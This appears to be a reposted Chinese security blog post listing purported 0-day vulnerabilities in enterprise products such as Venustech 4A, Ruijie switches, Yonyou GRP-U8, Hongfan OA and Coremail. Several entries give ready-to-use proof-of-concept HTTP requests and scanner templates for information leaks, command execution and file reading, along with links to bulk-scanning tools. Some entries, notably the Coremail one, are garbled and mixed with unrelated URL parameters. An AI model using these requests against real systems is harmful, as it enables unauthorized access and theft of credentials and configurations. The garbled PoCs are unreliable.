免责声明
月落星沉研究室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他违法行为!!!
0x01
启明星辰-4A 统一安全管控平台 getMater 信息泄漏
漏洞描述:
启明星辰集团4A统一安全管控平台实现IT资源集中管理,为企业提供集中的账号、认证、授权、审计管理技术支撑及配套流程,提升系统安全性和可管理能力。可获取相关人员敏感信息。
poc:
relative: req
0
session: false requests: - method: GET timeout:
10
path:
/accountApi/get
Master.do headers: User-Agent:
Mozilla/
5.0
(Windows NT
10.0
; WOW64) AppleWebKit/
537.36
(KHTML, like Gecko) Chrome/
65.0
.
881.36
Safari/
537.36
follow_redirects: true matches: (code.e
q("200")
&& body.contains
(
""state":true"
))
修复建议:
限制文件访问
0x02
锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露
漏洞描述:锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露漏洞
批量扫描工具:https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/%E9%94%90%E6%8D%B7%E4%BA%A4%E6%8D%A2%E6%9C%BAWEB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FEXCU_SHELL
poc
GET
/EXCU_SHELL
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Cmdnum: '1'
Command1: show running-config
Confirm1: n
0x03
科荣 AIO 管理系统存在文件读取漏洞
漏洞描述:
科荣AIO企业一体化管理解决方案,通过ERP(进销存财务)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台),集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。科荣 AIO 管理系统存在文件读取漏洞,攻击者可以读取敏感文件。
POC待补充
0x04
飞企互联 FE 业务协作平台 magePath 参数文件读取漏洞
漏洞描述:
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
POC待补充
0x05
用友GRP-U8存在信息泄露
漏洞描述:友U8系统存可直接访问log日志,泄露敏感信息
批量扫描工具:https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/%E7%94%A8%E5%8F%8BGRP-U8
GET
/logs/info.log
HTTP/1.1
0x06
nginx配置错误导致的路径穿越风险
漏洞自查PoC如下: https://github.com/hakaioffsec/navgix 该漏洞非0day,是一个路径穿越漏洞,可以直接读取nginx后台服务器文件。有多家重点金融企业已中招,建议尽快进行自查。
0x07
红帆 oa 注入
POC:
POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.
Host: 10.250.250.5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 383 Content-Type: text/xml; charset=utf-8 Soapaction: "http://tempuri.org/GetFileAtt" Accept-Encoding: gzip, deflate Connection: close
123
</
fileName
></
GetFileAtt
>
</
soap:Body
></
so
ap:Envelope
>
0x08
Coremail 邮件系统未授权访问获取管理员账密
POC:
/coremail/common/assets/
:/:/:/:/:/:/s?
biz=Mzl3MTk4NTcyNw==&mid=
2247485877
&idx=
1
&sn=
7
e5f77db320ccf9013c0b7aa7262
6688
chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688b
f6adaed61&scene=
2
这是我们手上掌握的部分漏洞,还有更多漏洞将在后面曝光,关注月落安全,大佬带你飞。
原文始发于微信公众号(月落安全):国护0day漏洞消息同步(Day7)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论